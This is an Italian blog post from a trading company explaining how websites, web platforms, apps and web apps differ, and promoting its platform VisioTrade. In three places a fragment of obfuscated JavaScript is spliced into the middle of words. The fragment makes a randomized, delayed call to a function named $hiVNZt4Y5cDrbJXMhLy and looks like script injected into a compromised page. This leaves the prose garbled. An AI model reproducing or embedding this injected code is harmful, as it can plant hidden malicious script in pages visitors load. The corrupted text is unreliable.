Da non perdere!

App, WebApp e Piattaforma: quali sono le differenze?

Pubblicato il 1 febbraio 2017
Condividi

websites-vs-webappsDefiniamo tre concetti molto diversi che vengono spesso confusi

App, WebApp e Piattaforma, insieme al più comune sito web, sono concetti piuttosto diversi che spesso vengono confusi.

Partendo dall’ultimo, il sito web, si può definire come:

un insieme di documenti (pagine web) correlate

 

Il sito quindi è una semplice vetrina, un insieme di contenuti come testi, foto e video. Immagina proprio la vetrina di un negozio.

Una Piattaforma web invece è uno strumento con cui si può interagire, un vero e proprio programma che però non si installa: si usa direttamente su internet.

In questo caso è come entrare nel negozio, toccare i prodotti, provarli ed eventualmente acquistarli.

Una Piattaforma però può essere estremamente grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande e articolata, al contrario di un sito che oltre un certo numero di pagine diventerebbe impossibile da gestire.

Per fare un paragone dovremmo esporre tutti i prodotti di un centro commerciale in una sola vetrina.

 

Qual’è la differenza tra App e WebApp?

Definita la differenza tra sito web e Piattaforma web, definiamo App e WebApp.

In modo semplificato la App è come un programma e si installa sul telefono. La WebApp è un programma web che si usa direttamente su internet.

Sviluppare una WebApp era la soluzione migliore per i nostri clienti, perchè avrebbe permesso di usufruire di una Piattaforma grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande e articolata come VisioTrade con la velocità dei nostri Server e senza occupare alcuno spazio sugli smartphone degli aderenti.

Presto, grazie ad IntelliTrade – l’intelligenza artificiale di VisioTrade che sostituirà per sempre l’obsoleta figura del trader – semplificheremo e velocizzeremo ancora una volta l’interazione degli aderenti, creandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la rete di scambio più evoluta del mondo.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *